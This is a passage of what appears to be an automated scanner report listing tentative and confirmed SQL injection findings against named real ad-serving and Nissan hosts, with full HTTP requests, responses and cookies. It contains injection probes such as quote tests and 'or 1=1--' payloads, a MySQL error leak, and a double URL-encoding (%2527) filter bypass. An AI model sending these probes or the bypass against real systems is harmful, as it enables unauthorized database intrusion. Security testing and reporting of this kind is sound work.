segments="17155|30304|10068|10069|40053|40050|39544|27804|22870|6761|38582,1298044270|40657|17277|24085|10102|5379|24391|39004|11262|5371|11265|10629|10660|10816|40057|8|28666|17440|27875|16733|26871|30211|39944|10641|29998|18125|39220|18129|24348|29994|24380|39650|5443|24810|27273|16034|24469|17163|10048|3771|39975|26901|16748|3779|18237|16490|16709|21886|28686|18134|22647|22994|21461|30353|7775|24461|24909|40589|20981|14947|28398|23667|27906|40046|18149|39646|17170|4465|38028|16713|3391|3783|24171|3392|23864|13746|3425|9800|38142|24352|38781|37720|2377|30530"; dp_rec="{\"1\": 1297089043+ \"3\": 1297527300+ \"2\": 1297185919+ \"4\": 1296660699}"; segments_p1="eJw1Uj1LQmEYTdN4uZM0Ci5tNTf2E8LFoKCpxaW1NagbRVEKBm4O0YeiZIRlSKl9ERVkoKVkZN6SBm8mVFRmJN33OU/LPZ7znudbxSomh2xtSoeYqpkMtAhBzKuZoM4A/Ung0ixca5rJ+AaNb4cIJcz0NktoFQcDBGf9pN5tQi33EdWojFVUxgiqvaTqE0j/zGXqnPKN8T0B/YP51yZ4Yxv8m/W5PPSFMLgnBfS9QA8UUX15HDSNadajZkURO1GzrR5p6hbDsOcg3zHg1EH2jAf2TNxssCzltoirklxCwYMK93GoWlGqj3HUrxTx+sSuLKN+yPOWgL8bPF8Wff50E23xOOot5KkeovN8nMX/I+UktouAU14qDTGiAzcYt2PIldgFT7Iv5UXufTuO6KRU2ojxdFTH0zHKnqiIOOXIcxVlL9xyR0cgl24j4NpJcXkn+Qox+G+C6KCkIu2DnTZWTcut1lh87SL4RBsNu1wOj9mKwHKATqddOPU+VB+on+mqixKEXcbv2ChJ553kyG0hXT6EjqvD8g+2ArFZRnhr0Nb2B9lxo48="

Response 1

HTTP/1.0 200 OK
Content-Type: text/html
Connection: close
X-Error-Code: 503
Content-Length: 0


Request 2

GET /gmatcher?id=CAESEJO5OHX5lNGIHL7fEEEJ4-Y&cver=1 HTTP/1.1
Host: g-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x2ff8fe.js&size_id=15&account_id=6005&site_id=12414&size=300x250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid=eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsIDczNDE1MV19; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8171\": [0+ 0+ 1296660699+ 2+ 1296659838+ 2]+ \"9239\": [0+ 0+ 1297186251+ 1+ 1297186251+ 1]+ \"9376\": [0+ 0+ 1296659628+ 1+ 1296659628+ 1]+ \"8991\": [0+ 0+ 1297259805+ 3+ 1297259805+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]+ \"9080\": [0+ 0+ 1297185928+ 1+ 1297185928+ 1]}"; impressions="{\"351309\": [1296660699+ \"6b326db0-ad1f-378f-98c3-837da14b6503\"+ 139089+ 81343+ 191]+ \"426723\": [1297259805+ \"d0c21fd3-dc6f-3508-8eb4-98c1ea2808ab\"+ 14387+ 57084+ 171]+ \"448883\": [1297186251+ \"2d72556f-3614-3865-9fd7-81648ddadef0\"+ 1770+ 21233+ 1365]+ \"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]+ \"456235\": [1296659628+ \"85680993-10ca-3909-9c72-ac737305e927\"+ 139089+ 81343+ 191]+ \"464239\": [1297185928+ \"5ca41985-3250-3989-8563-9e7bafc13c64\"+ 12149+ 59109+ 1365]+ \"426722\": [1297089042+ \"cf924af7-fb85-3eb0-b32f-8647072b898d\"+ 12202+ 59105+ 993]}"; partnerUID=eyIzOCI6ICJ1JTNENjI4NTE2MDUyNiUzQXMxJTNEMTI5NTQ4MjM3NjkxNyUzQXRzJTNEMTI5NzA4ODIyNDE1MCUzQXMyLjMzJTNEJTJDNjU3MCUyQzcwNTMlMkM2MzMzJTJDNTIyMyUyQzI3IiwgIjg0IjogWyJEVFFrZTdUOTk5WTRxWUpCIiwgdHJ1ZV19; frequency="{\"351309\": [1296660759+ 1+ 1296660699+ 2+ 1296659838+ 2]+ \"426723\": [1297274205+ 1+ 1297259805+ 1+ 1297259805+ 1]+ \"426722\": [1297103442+ 1+ 1297089042+ 2+ 1297089042+ 1]+ \"456235\": [1296659688+ 1+ 1296659628+ 1+ 1296659628+ 1]+ \"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]+ \"464239\": [1297214728+ 1+ 1297185928+ 1+ 1297185928+ 1]+ \"448883\": [1297272651+ 1+ 1297186251+ 1+ 1297186251+ 1]}"%00''; subID="{}"; segments="17155|30304|10068|10069|40053|40050|39544|27804|22870|6761|38582,1298044270|40657|17277|24085|10102|5379|24391|39004|11262|5371|11265|10629|10660|10816|40057|8|28666|17440|27875|16733|26871|30211|39944|10641|29998|18125|39220|18129|24348|29994|24380|39650|5443|24810|27273|16034|24469|17163|10048|3771|39975|26901|16748|3779|18237|16490|16709|21886|28686|18134|22647|22994|21461|30353|7775|24461|24909|40589|20981|14947|28398|23667|27906|40046|18149|39646|17170|4465|38028|16713|3391|3783|24171|3392|23864|13746|3425|9800|38142|24352|38781|37720|2377|30530"; dp_rec="{\"1\": 1297089043+ \"3\": 1297527300+ \"2\": 1297185919+ \"4\": 1296660699}"; segments_p1="eJw1Uj1LQmEYTdN4uZM0Ci5tNTf2E8LFoKCpxaW1NagbRVEKBm4O0YeiZIRlSKl9ERVkoKVkZN6SBm8mVFRmJN33OU/LPZ7znudbxSomh2xtSoeYqpkMtAhBzKuZoM4A/Ung0ixca5rJ+AaNb4cIJcz0NktoFQcDBGf9pN5tQi33EdWojFVUxgiqvaTqE0j/zGXqnPKN8T0B/YP51yZ4Yxv8m/W5PPSFMLgnBfS9QA8UUX15HDSNadajZkURO1GzrR5p6hbDsOcg3zHg1EH2jAf2TNxssCzltoirklxCwYMK93GoWlGqj3HUrxTx+sSuLKN+yPOWgL8bPF8Wff50E23xOOot5KkeovN8nMX/I+UktouAU14qDTGiAzcYt2PIldgFT7Iv5UXufTuO6KRU2ojxdFTH0zHKnqiIOOXIcxVlL9xyR0cgl24j4NpJcXkn+Qox+G+C6KCkIu2DnTZWTcut1lh87SL4RBsNu1wOj9mKwHKATqddOPU+VB+on+mqixKEXcbv2ChJ553kyG0hXT6EjqvD8g+2ArFZRnhr0Nb2B9lxo48="

Response 2

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 14 Feb 2011 20:04:17 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 14-Feb-2011 20:03:57 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 43

GIF89a.............!.......,...........D..;

1.10. http://g-pixel.invitemedia.com/gmatcher [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://g-pixel.invitemedia.com
Path:   /gmatcher

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /gmatcher?id=CAESEJO5OHX5lNGIHL7fEEEJ4-Y'&cver=1 HTTP/1.1
Host: g-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&mktid=3&mpid=1051206&fpid=-1&rnd=8244413144923814659&nu=n&sp=n
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8171\": [0+ 0+ 1296660699+ 2+ 1296659838+ 2]+ \"9239\": [0+ 0+ 1297186251+ 1+ 1297186251+ 1]+ \"9376\": [0+ 0+ 1296659628+ 1+ 1296659628+ 1]+ \"8991\": [0+ 0+ 1297259805+ 3+ 1297259805+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]+ \"9080\": [0+ 0+ 1297185928+ 1+ 1297185928+ 1]}"; impressions="{\"351309\": [1296660699+ \"6b326db0-ad1f-378f-98c3-837da14b6503\"+ 139089+ 81343+ 191]+ \"426723\": [1297259805+ \"d0c21fd3-dc6f-3508-8eb4-98c1ea2808ab\"+ 14387+ 57084+ 171]+ \"448883\": [1297186251+ \"2d72556f-3614-3865-9fd7-81648ddadef0\"+ 1770+ 21233+ 1365]+ \"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]+ \"456235\": [1296659628+ \"85680993-10ca-3909-9c72-ac737305e927\"+ 139089+ 81343+ 191]+ \"464239\": [1297185928+ \"5ca41985-3250-3989-8563-9e7bafc13c64\"+ 12149+ 59109+ 1365]+ \"426722\": [1297089042+ \"cf924af7-fb85-3eb0-b32f-8647072b898d\"+ 12202+ 59105+ 993]}"; partnerUID=eyIzOCI6ICJ1JTNENjI4NTE2MDUyNiUzQXMxJTNEMTI5NTQ4MjM3NjkxNyUzQXRzJTNEMTI5NzA4ODIyNDE1MCUzQXMyLjMzJTNEJTJDNjU3MCUyQzcwNTMlMkM2MzMzJTJDNTIyMyUyQzI3IiwgIjg0IjogWyJEVFFrZTdUOTk5WTRxWUpCIiwgdHJ1ZV19; frequency="{\"351309\": [1296660759+ 1+ 1296660699+ 2+ 1296659838+ 2]+ \"426723\": [1297274205+ 1+ 1297259805+ 1+ 1297259805+ 1]+ \"426722\": [1297103442+ 1+ 1297089042+ 2+ 1297089042+ 1]+ \"456235\": [1296659688+ 1+ 1296659628+ 1+ 1296659628+ 1]+ \"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]+ \"464239\": [1297214728+ 1+ 1297185928+ 1+ 1297185928+ 1]+ \"448883\": [1297272651+ 1+ 1297186251+ 1+ 1297186251+ 1]}"; subID="{}"; segments="17155|30304|10068|10069|40053|40050|39544|27804|22870|6761|38582,1298044270|40657|17277|24085|10102|5379|24391|39004|11262|5371|11265|10629|10660|10816|40057|8|28666|17440|27875|16733|26871|30211|39944|10641|29998|18125|39220|18129|24348|29994|24380|39650|5443|24810|27273|16034|24469|17163|10048|3771|39975|26901|16748|3779|18237|16490|16709|21886|28686|18134|22647|22994|21461|30353|7775|24461|24909|40589|20981|14947|28398|23667|27906|40046|18149|39646|17170|4465|38028|16713|3391|3783|24171|3392|23864|13746|3425|9800|38142|24352|38781|37720|2377|30530"; dp_rec="{\"1\": 1297089043+ \"3\": 1297527300+ \"2\": 1297185919+ \"4\": 1296660699}"; segments_p1="eJw1Uj1LQmEYTdN4uZM0Ci5tNTf2E8LFoKCpxaW1NagbRVEKBm4O0YeiZIRlSKl9ERVkoKVkZN6SBm8mVFRmJN33OU/LPZ7znudbxSomh2xtSoeYqpkMtAhBzKuZoM4A/Ung0ixca5rJ+AaNb4cIJcz0NktoFQcDBGf9pN5tQi33EdWojFVUxgiqvaTqE0j/zGXqnPKN8T0B/YP51yZ4Yxv8m/W5PPSFMLgnBfS9QA8UUX15HDSNadajZkURO1GzrR5p6hbDsOcg3zHg1EH2jAf2TNxssCzltoirklxCwYMK93GoWlGqj3HUrxTx+sSuLKN+yPOWgL8bPF8Wff50E23xOOot5KkeovN8nMX/I+UktouAU14qDTGiAzcYt2PIldgFT7Iv5UXufTuO6KRU2ojxdFTH0zHKnqiIOOXIcxVlL9xyR0cgl24j4NpJcXkn+Qox+G+C6KCkIu2DnTZWTcut1lh87SL4RBsNu1wOj9mKwHKATqddOPU+VB+on+mqixKEXcbv2ChJ553kyG0hXT6EjqvD8g+2ArFZRnhr0Nb2B9lxo48="; exchange_uid=eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsIDczNDE4Ml19

Response 1

HTTP/1.0 200 OK
Content-Type: text/html
Connection: close
X-Error-Code: 503
Content-Length: 0


Request 2

GET /gmatcher?id=CAESEJO5OHX5lNGIHL7fEEEJ4-Y''&cver=1 HTTP/1.1
Host: g-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&mktid=3&mpid=1051206&fpid=-1&rnd=8244413144923814659&nu=n&sp=n
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8171\": [0+ 0+ 1296660699+ 2+ 1296659838+ 2]+ \"9239\": [0+ 0+ 1297186251+ 1+ 1297186251+ 1]+ \"9376\": [0+ 0+ 1296659628+ 1+ 1296659628+ 1]+ \"8991\": [0+ 0+ 1297259805+ 3+ 1297259805+ 1]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]+ \"9080\": [0+ 0+ 1297185928+ 1+ 1297185928+ 1]}"; impressions="{\"351309\": [1296660699+ \"6b326db0-ad1f-378f-98c3-837da14b6503\"+ 139089+ 81343+ 191]+ \"426723\": [1297259805+ \"d0c21fd3-dc6f-3508-8eb4-98c1ea2808ab\"+ 14387+ 57084+ 171]+ \"448883\": [1297186251+ \"2d72556f-3614-3865-9fd7-81648ddadef0\"+ 1770+ 21233+ 1365]+ \"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]+ \"456235\": [1296659628+ \"85680993-10ca-3909-9c72-ac737305e927\"+ 139089+ 81343+ 191]+ \"464239\": [1297185928+ \"5ca41985-3250-3989-8563-9e7bafc13c64\"+ 12149+ 59109+ 1365]+ \"426722\": [1297089042+ \"cf924af7-fb85-3eb0-b32f-8647072b898d\"+ 12202+ 59105+ 993]}"; partnerUID=eyIzOCI6ICJ1JTNENjI4NTE2MDUyNiUzQXMxJTNEMTI5NTQ4MjM3NjkxNyUzQXRzJTNEMTI5NzA4ODIyNDE1MCUzQXMyLjMzJTNEJTJDNjU3MCUyQzcwNTMlMkM2MzMzJTJDNTIyMyUyQzI3IiwgIjg0IjogWyJEVFFrZTdUOTk5WTRxWUpCIiwgdHJ1ZV19; frequency="{\"351309\": [1296660759+ 1+ 1296660699+ 2+ 1296659838+ 2]+ \"426723\": [1297274205+ 1+ 1297259805+ 1+ 1297259805+ 1]+ \"426722\": [1297103442+ 1+ 1297089042+ 2+ 1297089042+ 1]+ \"456235\": [1296659688+ 1+ 1296659628+ 1+ 1296659628+ 1]+ \"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]+ \"464239\": [1297214728+ 1+ 1297185928+ 1+ 1297185928+ 1]+ \"448883\": [1297272651+ 1+ 1297186251+ 1+ 1297186251+ 1]}"; subID="{}"; segments="17155|30304|10068|10069|40053|40050|39544|27804|22870|6761|38582,1298044270|40657|17277|24085|10102|5379|24391|39004|11262|5371|11265|10629|10660|10816|40057|8|28666|17440|27875|16733|26871|30211|39944|10641|29998|18125|39220|18129|24348|29994|24380|39650|5443|24810|27273|16034|24469|17163|10048|3771|39975|26901|16748|3779|18237|16490|16709|21886|28686|18134|22647|22994|21461|30353|7775|24461|24909|40589|20981|14947|28398|23667|27906|40046|18149|39646|17170|4465|38028|16713|3391|3783|24171|3392|23864|13746|3425|9800|38142|24352|38781|37720|2377|30530"; dp_rec="{\"1\": 1297089043+ \"3\": 1297527300+ \"2\": 1297185919+ \"4\": 1296660699}"; segments_p1="eJw1Uj1LQmEYTdN4uZM0Ci5tNTf2E8LFoKCpxaW1NagbRVEKBm4O0YeiZIRlSKl9ERVkoKVkZN6SBm8mVFRmJN33OU/LPZ7znudbxSomh2xtSoeYqpkMtAhBzKuZoM4A/Ung0ixca5rJ+AaNb4cIJcz0NktoFQcDBGf9pN5tQi33EdWojFVUxgiqvaTqE0j/zGXqnPKN8T0B/YP51yZ4Yxv8m/W5PPSFMLgnBfS9QA8UUX15HDSNadajZkURO1GzrR5p6hbDsOcg3zHg1EH2jAf2TNxssCzltoirklxCwYMK93GoWlGqj3HUrxTx+sSuLKN+yPOWgL8bPF8Wff50E23xOOot5KkeovN8nMX/I+UktouAU14qDTGiAzcYt2PIldgFT7Iv5UXufTuO6KRU2ojxdFTH0zHKnqiIOOXIcxVlL9xyR0cgl24j4NpJcXkn+Qox+G+C6KCkIu2DnTZWTcut1lh87SL4RBsNu1wOj9mKwHKATqddOPU+VB+on+mqixKEXcbv2ChJ553kyG0hXT6EjqvD8g+2ArFZRnhr0Nb2B9lxo48="; exchange_uid=eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsIDczNDE4Ml19

Response 2

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 14 Feb 2011 20:04:14 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 14-Feb-2011 20:03:54 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: exchange_uid="eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWScnIiwgNzM0MTgyXX0="; Domain=invitemedia.com; expires=Tue, 14-Feb-2012 20:04:14 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

1.11. http://ilinks.industrybrains.com/showct [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ilinks.industrybrains.com
Path:   /showct

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /showct?sid=852&ct=NBCAMINEWS&num=3&layt=1 HTTP/1.1
Host: ilinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.nbcmiami.com/news/local-beat/Explosion-Blows-Lid-Off-Broward-Grow-House-116149574.html?dr&1%20and%201%3d1--%20=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Mon, 14 Feb 2011 20:23:37 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 14 Feb 2011 20:23:37 GMT
Content-Type: text/html; charset=windows-1252
Content-Length: 9141

<style type="text/css" xmlns:ibn="urn:industrybrains.com:linkserver">
body {overflow: hidden;}
</style><table width="310px" border="0" cellpadding="0" cellspacing="0" xmlns:ibn="urn:indus
...[SNIP]...
6208bc3d5014a432f180a626a835afe4106841082ec007a2960abba351c9d4726e4a88e156399939be67abfd78198388bd155239e042a16384c39c2b354d7bf4d627755b77ca69d8dbb2581d76740ed76ef751e6c4e61ac5b70be844a5973dfe6092f3d">Exceptional Service, No Hidden-Fees &amp; Competitive Prices - Guaranteed!</a>
...[SNIP]...

Request 2

GET /showct?sid=852&ct=NBCAMINEWS&num=3&layt=1 HTTP/1.1
Host: ilinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.nbcmiami.com/news/local-beat/Explosion-Blows-Lid-Off-Broward-Grow-House-116149574.html?dr&1%20and%201%3d1--%20=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13%2527%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 14 Feb 2011 20:23:37 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 14 Feb 2011 20:23:37 GMT
Content-Type: text/html; charset=windows-1252
Content-Length: 8688

<style type="text/css" xmlns:ibn="urn:industrybrains.com:linkserver">
body {overflow: hidden;}
</style><table width="310px" border="0" cellpadding="0" cellspacing="0" xmlns:ibn="urn:indus
...[SNIP]...

1.12. http://local.nissanusa.com/zip.aspx [vehicle parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://local.nissanusa.com
Path:   /zip.aspx

Issue detail

The vehicle parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the vehicle parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /zip.aspx?regionalZipCode=null&vehicle=cube'&dcp=zmm.50658539.&dcc=40676258.226884165 HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Mon, 14 Feb 2011 20:05:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 14 Feb 2011 20:05:42 GMT
Content-Length: 6558
Connection: close
Set-Cookie: PHPSESSID=5sl4j9evsvc175trdinnvn98c7; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
</div>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '27'
    AND a.version = 'en'
    AND ac.category_page='ZPA'
AND' at line 5

Request 2

GET /zip.aspx?regionalZipCode=null&vehicle=cube''&dcp=zmm.50658539.&dcc=40676258.226884165 HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Mon, 14 Feb 2011 20:05:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 14 Feb 2011 20:05:42 GMT
Content-Length: 16950
Connection: close
Set-Cookie: PHPSESSID=h4uscg4ast5gr5hc2vhht9mn12; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

1.13. http://tap.rubiconproject.com/oz/sensor [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 19609074'%20or%201%3d1--%20 and 19609074'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /oz/sensor?p=rubicon&pc=6451/11949&cd=false&xt=22&k=nbc+miami:424,miami:221,local+news:160,miami+local:160,breaking+news:120,news:102,miami+traffic:80,local+new:80,local+beat:64,new:45,watch:42,news+stories:40,miami+weather:40,miami+channel:40,traffic+watch:40,miami+updates:40,miami+business:40,miami+breaking:40,channel+6:40,national+news:40,health+news:40,miami+events:40,breaking+new:40,miami+fl:40,miami+health:40,miami+sports:40,weather:40,traffic:40,around+town:32,breaking:30,events:30,entertainment:30,open+house:24,minutes+ago:24,arcade+fire:24,fashion+week:24,look:24,live+outside:24,getty+images:24,display+name:24,&t=NBC+Miami+-+Local+News,+Weather,+Traffic,+Entertainment,+Events,+Breaking+News+|+NBC+Miami HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=19609074'%20or%201%3d1--%20
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GIP9HWY4-MADS-10.208.38.239; put_1994=6ch47d7o8wtv; xdp_ti="7 Feb 2011 22:48:47 GMT"; put_1986=4760492999213801733; put_2132=D8DB51BF08484217F5D14AB47F4002AD; put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="14 Feb 2011 01:33:42 GMT"; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; put_2100=usr3fd748acf5bcab14; put_1185=3011330574290390485; put_2081=CA-00000000456885722; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_1197=3297869551067506954; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; rpb=2399%3D1%264210%3D1%265328%3D1%265671%3D1%266286%3D1%264214%3D1%262119%3D1%264940%3D1%266457%3D1%266276%3D1%266356%3D1%264944%3D1%264894%3D1%264939%3D1%265852%3D1%264222%3D1%266073%3D1%264212%3D1%264554%3D1%262372%3D1%263812%3D1%262374%3D1%264970%3D1; ruid=154d290e46adc1d6f373dd09^16^1297713625^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ+PP8TzZUxGDmBad2r6N25AKxdPo9e; csi18=3177477.js^1^1297713820^1297713820&3165136.js^2^1297648333^1297713635&3170027.js^6^1297648512^1297650508&3171141.js^5^1297647789^1297649600&3149602.js^5^1297647214^1297647787&3149572.js^4^1297647219^1297647609; ses9=12414^33; csi9=3188560.js^2^1297652327^1297713855&3137079.js^2^1297713638^1297713838&3144262.js^1^1297652507^1297652507&3136969.js^8^1297649239^1297652327&3175999.js^3^1297651784^1297652146&3144258.js^2^1297651055^1297651599&3143935.js^8^1297647243^1297651417&3187611.js^4^1297647245^1297650697&3171136.js^1^1297649240^1297649240&3147455.js^11^1297646572^1297649056; ses18=12414^30; khaos=GIPAEQ2D-C-IOYY; ses15=12414^65&4801^1&12887^1; 